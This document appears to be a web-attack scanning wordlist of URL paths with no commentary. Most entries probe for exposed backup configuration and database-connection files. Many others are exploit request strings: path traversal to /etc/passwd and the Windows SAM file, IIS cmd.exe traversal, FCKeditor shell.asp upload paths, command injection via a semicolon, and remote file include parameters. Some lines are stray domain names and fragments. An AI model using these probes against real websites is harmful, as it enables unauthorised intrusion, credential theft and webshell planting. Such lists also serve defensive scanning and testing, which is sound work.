,..,
."./."./winnt/win.ini%20.php3
....../autoexec.bat
..../config.sys
../../../../../../autoexec.bat
../../../../../../scandisk.log
../../../../../winnt/repair/sam._
../../../../config.sys
../../../autoexec.bat
../../../scandisk.log
../../../winnt/repair/sam._
../../myserverexec-0.2/readme.txt
../../template/shared/indextemplate.xml
../../windows/user.dat
../readme.txt
..336699
..default
..index
..login
..manage
./cgi-bin/./test.cgi
./web-inf/web.xml
.adminpass.txt
.jsp/web-inf/classes/env.java
.userid.pwd
_admin/config.asp.bak
_admin/config.inc.bak
_admin/config.inc.php.bak
_admin/conn.php.bak
_admin/ftp.php.bak
_admin/ftp_config.php.bak
_admin/z9v8config.inc.bak
_admin/z9v8config.inc.php.bak
_admin/z9v8conn.asp.bak
_admin/z9v8ftp.php.bak
_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:/orderinfo.txt
_vti_bin/fpcount.exe?page=default.htm|image=2|digits=1
0.0.
0.0.1212
00..00..
00..112233
123..
13.14.15
216.2.8.114
2ccc.com.txt
8000/./web-inf/web.xml
8000/servlet/com.livesoftware.jrun.plugins.jsp.jsp/../../../tst.txt
8000/servlet/jsp/../../tst.txt
8080/../readme.txt
88bmw.com.rar
9090/servlet/com.sun.server.http.pagecompile.jsp92.jspservlet/board.html
996633..
ad/config.asp.bak
ad/config.inc.bak
ad/config.inc.php.bak
ad/conn.asp.bak
ad/conn.php.bak
ad/ftp.php.bak
ad/ftp_config.php.bak
ad/sql_config.php.bak
ad/web.config.bak
ad/z9v8config.asp.bak
ad/z9v8config.inc.bak
ad/z9v8config.inc.php.bak
ad/z9v8conn.asp.bak
ad/z9v8conn.php.bak
ad/z9v8ftp.php.bak
ad/z9v8ftp_config.php.bak
ad/z9v8sql_config.php.bak
ad/z9v8web.config.bak
admin.asp.bak
admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
admin/admin_/login.pl.bak
admin/admin_/login.pl.bk
admin/admin_login.asp.ba
admin/admin_login.asp.bak
admin/admin_login.asp.bk
admin/admin_login.jsp.ba
admin/admin_login.jsp.bak
admin/admin_login.jsp.bk
admin/admin_login.php.ba
admin/admin_login.php.bak
admin/admin_login.php.bk
admin/admin_login.pl.bak
admin/admin_login.pl.bk
admin/chinaz.com.txt
admin/config.asp.bak
admin/config.inc.bak
admin/config.inc.php.bak
admin/conn.asp.bak
admin/conn.php.bak
admin/edit/admin_uploadfile.asp?id=14&dir=..
admin/editor/admin_uploadfile.asp?id=14&dir=..
admin/eweb/admin_uploadfile.asp?id=14&dir=..
admin/ewebeditor/admin_uploadfile.asp?id=14&dir=..
admin/ftp.php.bak
admin/ftp_config.php.bak
admin/login.asp.bak
admin/login.asp.bk
admin/login.jsp.bak
admin/login.jsp.bk
admin/login.php.bak
admin/login.php.bk
admin/login.pl.bak
admin/login.pl.bk
admin/sql_config.php.bak
admin/system/editor/fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createfolder&type=image&currentfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684
admin/uploadpic.asp?language=&editimagenum=0&editremnum=1.asp;41513102009204012
admin/web.config.bak
admin/z9v8config.asp.bak
admin/z9v8config.inc.bak
admin/z9v8config.inc.php.bak
admin/z9v8conn.asp.bak
admin/z9v8conn.php.bak
admin/z9v8ftp.php.bak
admin/z9v8ftp_config.php.bak
admin/z9v8sql_config.php.bak
admin/z9v8web.config.bak
admin_/config.inc.bak
admin_/ftp.php.bak
admin_/ftp_config.php.bak
admin_/login.pl.bak
admin_/login.pl.bk
admin_/z9v8config.asp.bak
admin_/z9v8config.inc.bak
admin_/z9v8config.inc.php.bak
admin_/z9v8conn.asp.bak
admin_/z9v8conn.php.bak
admin_/z9v8ftp.php.bak
admin_/z9v8ftp_config.php.bak
admin_/z9v8sql_config.php.bak
admin_admin.asp.bak
admin_chklogin.asp.bak
admin_config.asp.bak
admin_config.aspx.bak
admin_config.php.bak
admin_data.asp.bak
admin_data.aspx.bak
admin_data.php.bak
admin_index.asp.bak
admin_login.asp.bak
admin_login.asp.bk
admin_login.jsp.bak
admin_login.jsp.bk
admin_login.php.bak
admin_login.php.bk
admin_login.pl.bak
admin_login.pl.bk
admin_main.asp.bak
admin_menu.asp.bak
admin_uploadfile.asp?id=14&dir=..
admin_uploadfile.asp?id=14&dir=../..
admin_uploadfile.asp?id=14&dir=../../..
admin_uploadfile.aspx?id=14&dir=../../..
admin_uploadfile.php?id=14&dir=../../..
admin123/config.inc.bak
admin123/config.inc.php.bak
admin123/conn.asp.bak
admin123/conn.php.bak
admin123/ftp_config.php.bak
admin123/sql_config.php.bak
admin123/z9v8config.inc.bak
admin123/z9v8config.inc.php.bak
admin123/z9v8ftp.php.bak
admin500.com.jpg
adminabc/config.inc.bak
adminabc/conn.php.bak
adminabc/ftp.php.bak
adminabc/ftp_config.php.bak
adminabc/web.config.bak
adminabc/z9v8config.asp.bak
adminabc/z9v8config.inc.php.bak
adminabc/z9v8conn.php.bak
adminabc/z9v8ftp.php.bak
adminabc/z9v8ftp_config.php.bak
album/?mode=album&album=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&dispsize=640&start=0
api/config.asp.bak
api/config.inc.bak
api/conn.asp.bak
api/ftp.php.bak
api/ftp_config.php.bak
api/sql_config.php.bak
api/web.config.bak
api/z9v8config.inc.php.bak
api/z9v8conn.php.bak
api/z9v8ftp.php.bak
api/z9v8ftp_config.php.bak
api/z9v8web.config.bak
apmserv5.2.6.rar
app_data/app_data.mdb.bak
app_data/data.mdb.bak
app_data/database.mdb.bak
app_data/db.mdb.bak
bbs/admin/_notes/edit_admin.php.mno
bbs/admin/_notes/edit_forum_edit.php.mno
bbs/admin/_notes/edit_forum_gonggao.php.mno
bbs/admin/_notes/edit_forum_index.php.mno
bbs/admin/_notes/edit_forum_index2.php.mno
bbs/admin/_notes/edit_forum_topedit.php.mno
bbs/admin/_notes/success.htm.mno
bbs/config.asp.bak
bbs/config.inc.bak
bbs/config.inc.php.bak
bbs/conn.asp.bak
bbs/conn.php.bak
bbs/forum/_notes/default.php.mno
bbs/forum/_notes/detail.php.mno
bbs/forum/_notes/reply.php.mno
bbs/forum/_notes/show.php.mno
bbs/forum/_notes/success.php.mno
bbs/ftp.php.bak
bbs/ftp_config.php.bak
bbs/sql_config.php.bak
bbs/web.config.bak
bbs/z9v8config.asp.bak
bbs/z9v8config.inc.bak
bbs/z9v8config.inc.php.bak
bbs/z9v8conn.asp.bak
bbs/z9v8conn.php.bak
bbs/z9v8ftp.php.bak
bbs/z9v8ftp_config.php.bak
bbs/z9v8sql_config.php.bak
bbs/z9v8web.config.bak
bin/.cobalt/siteusermod/siteusermod.cgi
bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&topicsubject=&replyto=0
bin/webplus.cgi?script=/webplus/webping/webping.wml
book/inc/conn.asp.bak
caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
caspsamp/codebrws.asp?source=/caspsamp/../license.lic
cfdocs/expeval/exprcalc.cfm?openfilepath=c:/winnt/repair/sam._
cgi/.cobalt/siteusermod/siteusermod.cgi
cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
cgi/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&topicsubject=&replyto=0
cgi/webplus.cgi?script=/webplus/webping/webping.wml
cgi-bin/.adminpass.txt
cgi-bin/.cobalt/siteusermod/siteusermod.cgi
cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
cgi-bin/data/.adminpass.txt
cgi-bin/db2www/library/document.d2w/report?uid=unknown&pwd=&search_type=simple&r_host=&last_page=db2www0022.html&fn=db2www.html
cgi-bin/hello.exe?aaaaaaaaaaaaaaaaaaaa...ax224
cgi-bin/hpnst.exe?c=p+i=srvsysteminfo.html
cgi-bin/newsdesk.cgi?t=../pass.txt
cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&topicsubject=&replyto=0
cgi-bin/powerup/r.cgi?file=main.html
cgi-bin/powerup/r.pl?file=main.html
cgi-bin/quikstore.cgi?page=../quikstore.cgi%00html&cart_id=
cgi-bin/replicator/webpage.cgi/313373/ukr.htm
cgi-bin/revshare/joinpage.cgi?p=join-ibill.html
cgi-bin/store.cgi?startid=../etc/hosts%00.html
cgi-bin/store.cgi?startid=../etc/passwd%00.html
cgi-bin/store/agora.cgi?page=hoschi.html
cgi-bin/tst.bat|type%20c:/file.txt
cgi-bin/way-board/way-board.cgi?db=way-board.cgi%00
cgi-bin/webplus.cgi?script=/webplus/webping/webping.wml
cgi-bin/webplus.cgiscript=/webplus/webping/webping.wml
chinaz.com.txt
ciwebhitsfile=/../../winnt/system32/config/system.log&cirestriction=none&cihilitetype=full
ckfinder/ckfinder.html?action=js&func=setfilefield&data=xpicture&thumbfunc=showthumbnails&start=images.asp%3a%2f%3a0
code.asp.bak
code.aspx.bak
code.php.bak
config.asp.bak
config.aspx.bak
config.inc.bak
config.inc.php.bak
config.php.bak
config/config.asp.bak
config/conn.asp.bak
config/ftp_config.php.bak
config/web.config.bak
config/z9v8config.asp.bak
config/z9v8config.inc.bak
config/z9v8config.inc.php.bak
config/z9v8conn.asp.bak
config/z9v8ftp.php.bak
conn.asp.bak
conn.asp.bk
conn.aspx.bak
conn.inc.bak
conn.inc.bk
conn.php.bak
conn/conn.asp.bak
connection.asp.bak
connection.aspx.bak
connection.php.bak
counter.inc.bak
counter.inc.bk
cpu.rar.rar
cutenews/comments.php?cutepath=anotherhost_with_config.php_or_news.txt
cutenews/search.php?cutepath=anotherhost_with_config.php_or_news.txt
cutenews/shownews.php?cutepath=anotherhost_with_config.php_or_news.txt
cutesoft_client/cuteeditor/load.ashx?type=image&file=../../../web.config
data/.adminpass.txt
data/db.asp.bak
database/siteweaver6.5.m
db/chinaz.com.txt
dbconnect.asp.bak
dbconnect.asp.bk
dbconnect.inc.bak
dbconnect.inc.bk
default.asp%3f+.htr
default.asp.
default.asp.bak
default.asp+.htr
default.aspx.bak
default.php.bak
default_1.asp.bak
default_1.aspx.bak
default_1.php.bak
default1.asp.bak
default1.aspx.bak
default1.php.bak
default2.asp.bak
default2.aspx.bak
default2.php.bak
dm.asp.bak
dnt.config.bak
downcode.com.txt
dvbbs8.0.0_ac
edit/admin_uploadfile.asp?id=14&dir=..
edit/v2.80%e4%bf%ae%e6%ad%a3%e7%89%88%e8%af%b4%e6%98%8e.txt
editor/admin_uploadfile.asp?id=14&dir=..
eweb/admin_uploadfile.asp?id=14&dir=..
ewebeditor/admin_uploadfile.asp?id=14&dir=..
ext.ini.%00.txt
fblogv3.0.3
fckeditor/editor/filemanager/browser/default/browser.html?type=../&connector=connectors/aspx/connector.aspxx
fckeditor/editor/filemanager/browser/default/browser.html?type=../&connector=connectors/aspx/connector.phpx
fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createfolder&type=image&currentfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684
fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createfolder&type=image&currentfolder=/shell.asp&newfoldername=z&uuid=1244789975684
ftp.php.bak
ftp_config.php.bak
funciton.asp.bak
funciton.aspx.bak
funciton.php.bak
global.asa%3f+.htr
global.asa.1
global.asa.2
global.asa.bak
global.asa.bk
global.asa.old
global.asa+.htr
ht/conn.asp.bak
icast.txtdd.txt
iissamples/exair/search/qfullhit.htw?ciwebhitsfile=/../../winnt/system32/config/system.log&cirestriction=none&cihilitetype=full
iissamples/issamples/oop/qfullhit.htw?ciwebhitsfile=/../../winnt/system32/config/system.log&cirestriction=none&cihilitetype=full
image/config.asp.bak
image/config.inc.bak
image/conn.asp.bak
image/conn.php.bak
image/web.config.bak
image/z9v8config.inc.bak
image/z9v8config.inc.php.bak
image/z9v8ftp.php.bak
image/z9v8ftp_config.php.bak
image/z9v8sql_config.php.bak
image/z9v8web.config.bak
inc.asp.bak
inc.aspx.bak
inc.php.bak
inc/config.asp.bak
inc/config.inc.bak
inc/conn.asp.bak
inc/conn.asp.bk
inc/conn.inc.bak
inc/conn.inc.bk
inc/conn.php.bak
inc/counter.inc.bak
inc/counter.inc.bk
inc/dbconnect.asp.bak
inc/dbconnect.asp.bk
inc/dbconnect.inc.bak
inc/dbconnect.inc.bk
inc/ftp.php.bak
inc/z9v8config.inc.bak
inc/z9v8config.inc.php.bak
inc/z9v8conn.asp.bak
inc/z9v8conn.php.bak
inc/z9v8web.config.bak
include/bd_footer.inc.html
include/conn.asp.bak
include/conn.asp.bk
include/conn.inc.bak
include/conn.inc.bk
include/counter.inc.bak
include/counter.inc.bk
include/dbconnect.asp.bak
include/dbconnect.asp.bk
include/dbconnect.inc.bak
include/dbconnect.inc.bk
index.asp%3f+.htr
index.asp.
index.asp.bak
index.asp+.htr
index.aspx.bak
index.files/+json.dataurl[i]+
index.files/index.files/haogx.js
index.files/index.files/sendmail.js
index.html.bak
index.jsp%2e..
index.jsp%3f+.htr
index.jsp.
index.jsp..
index.jsp.bak
index.php.bak
index.php?chemin=..%2f..%2f..%2f..%2f..%2f..%2f%2fetc
index.php3.%5c../..%5cconf/httpd.conf
index1.asp.bak
index1.aspx.bak
index1.php.bak
jspweb-inf/classes/env.java.bak
list.asp.bak
login.asp%3f+.htr
login.asp.bak
login.asp.bk
login.asp?+.htr
login.jsp.bak
login.jsp.bk
login.php.bak
login.php.bk
login.pl.bak
login.pl.bk
love/love.621net.com.sql
love/lt263.com.txt
mailto:wholnews@663.com.cn
main.asp%3f.htr
main.asp.
main.asp.bak
main.asp+.htr
manage.asp.bak
manage/config.asp.bak
manage/config.inc.bak
manage/config.inc.php.bak
manage/conn.asp.bak
manage/conn.php.bak
manage/edit/admin_uploadfile.asp?id=14&dir=..
manage/editor/admin_uploadfile.asp?id=14&dir=..
manage/ewebeditor/admin_uploadfile.asp?id=14&dir=..
manage/ftp.php.bak
manage/ftp_config.php.bak
manage/sql_config.php.bak
manage/web.config.bak
manage/z9v8config.asp.bak
manage/z9v8config.inc.bak
manage/z9v8config.inc.php.bak
manage/z9v8conn.asp.bak
manage/z9v8conn.php.bak
manage/z9v8ftp.php.bak
manage/z9v8ftp_config.php.bak
manage/z9v8sql_config.php.bak
manage/z9v8web.config.bak
men/config.asp.bak
men/config.inc.bak
men/conn.php.bak
men/ftp_config.php.bak
men/web.config.bak
men/z9v8config.asp.bak
men/z9v8config.inc.bak
men/z9v8config.inc.php.bak
men/z9v8ftp.php.bak
men/z9v8ftp_config.php.bak
men/z9v8sql_config.php.bak
men/z9v8web.config.bak
menu.asp.bak
myserverexec-0.2/readme.txt
network_query.php?portnum=80&querytype=all&target=www.someserver.com%3bls+-l&submit=do+it
newslogin.htm.
null.htw?ciwebhitsfile=/global.asa%20&cirestriction=none&cihilitetype=full
null.htw?ciwebhitsfile=/index.asp%20&cirestriction=none&cihilitetype=full
null.htwciwebhitsfile=/global.asa%20&cirestriction=none&cihilitetype=full
open.asp.bak
open.aspx.bak
open.php.bak
opt/casp/admin/conf/hkey.current.user
opt/caspadmin/conf/hkey.current.user
passes/.htpasswd.nkmd
phpmyadmin/config.asp.bak
phpmyadmin/config.inc.php.bak
phpmyadmin/conn.asp.bak
phpmyadmin/conn.php.bak
phpmyadmin/ftp.php.bak
phpmyadmin/web.config.bak
phpmyadmin/z9v8config.inc.bak
phpmyadmin/z9v8config.inc.php.bak
phpmyadmin/z9v8ftp.php.bak
phpmyadmin/z9v8web.config.bak
piay.791.1587.0
play/25878094.flv%7chttp:/www.02zz.cn/play/zhaoshang.flv
play/25878094.flv%7chttp:www.02zz.cn/play/zhaoshang.flv
pservlet.html^/pservlet.html
ra5586.com.rar
reg/conn.asp.bak
right.asp.bak
sample.jhtml.
scripts/bbs.pl%3f+.htr
scripts/bbs.pl?+.htr
scripts/bbs.pl+.htr
scripts/carello/carello.dll?carellocode=site2&vbexe=c:/../winnt/system32/cmd.exe%20/c%20echo%20test>c:/defcom.txt
scripts/convert..asa
scripts/default.asp+.pl
scripts/passwd.txt+.pl
scripts/test.pl?+.htr
scripts/test.pl+.htr
scripts/we3.3.3/webevent.pl
servlet/com.livesoftware.jrun.plugins.jsp.jsp/../../../tst.txt
servlet/com.livesoftware.jrun.plugins.ssi.ssifilter
servlet/com.unify.ewave.servletexec.uploadservlet
servlet/jsp/../../tst.txt
servlet/oracle.xml.xsql.xsqlservlet/soapdocs/webapps/soap/web-inf/config/soapconfig.xml
servlet/oracle.xml.xsql.xsqlservlet/xsql/lib/xsqlconfig.xml
setup.asp.bak
setup.aspx.bak
setup.php.bak
shujuku/shujuku3.0.asa
sql_config.php.bak
squirrelspell/modules/check_me.mod.php?sqspell_app[blah]=wall%
ss.cfg,ncl_items.html
subscribe.pl?test@test.com
subscribe.pltest@test.com
syscode.asp.bak
syscode.aspx.bak
syscode.php.bak
tddownload/wgxzdown3.5.rar
technote/main.cgi/oops?board=free_board&command=down_load&filename=/../../../main.cgi
template/index.asp/css.css
test.asp.bak
test.aspx.bak
test.php.bak
upload/config.asp.bak
upload/config.inc.bak
upload/conn.asp.bak
upload/z9v8config.asp.bak
upload/z9v8config.inc.bak
upload/z9v8config.inc.php.bak
upload/z9v8conn.asp.bak
upload/z9v8conn.php.bak
upload/z9v8ftp_config.php.bak
upload/z9v8sql_config.php.bak
uploadfiles/config.inc.bak
uploadfiles/config.inc.php.bak
uploadfiles/conn.asp.bak
uploadfiles/conn.php.bak
uploadfiles/ftp.php.bak
uploadfiles/sql_config.php.bak
uploadfiles/z9v8config.inc.php.bak
uploadfiles/z9v8conn.asp.bak
uploadfiles/z9v8conn.php.bak
uploadfiles/z9v8web.config.bak
uploadimage/config.asp.bak
uploadimage/config.inc.php.bak
uploadimage/conn.php.bak
uploadimage/sql_config.php.bak
uploadimage/web.config.bak
uploadimage/z9v8config.asp.bak
uploadimage/z9v8config.inc.bak
uploadimage/z9v8config.inc.php.bak
uploadimage/z9v8conn.asp.bak
uploadimage/z9v8ftp.php.bak
uploadimage/z9v8ftp_config.php.bak
uploadimage/z9v8sql_config.php.bak
uploadimage/z9v8web.config.bak
uploadpic.asp?language=&editimagenum=0&editremnum=1.asp;41513102009204012
uploads/index.html.bak
user/config.asp.bak
user/conn.asp.bak
user/conn.php.bak
user/ftp.php.bak
user/ftp_config.php.bak
user/sql_config.php.bak
user/z9v8config.asp.bak
user/z9v8config.inc.php.bak
user/z9v8conn.asp.bak
user/z9v8ftp_config.php.bak
user/z9v8web.config.bak
usermanage.asp.bak
web.config.bak
webeditor/admin_uploadfile.asp?id=14&dir=../../..
webeditor/admin_uploadfile.aspx?id=14&dir=../../..
webeditor/admin_uploadfile.php?id=14&dir=../../..
web-inf./web.xml
www.51marry.com
www.hao123.net
www.hao222.com
www.hao222.net
www.vvvdj.com
wx/s.dll?d=/bootlog.txt
xiaxiayu...
yuanma365.com.txt
z9v8config.asp.bak
z9v8config.inc.bak
z9v8config.inc.php.bak
z9v8conn.asp.bak
z9v8conn.php.bak
z9v8ftp.php.bak
z9v8ftp_config.php.bak
z9v8sql_config.php.bak
z9v8web.config.bak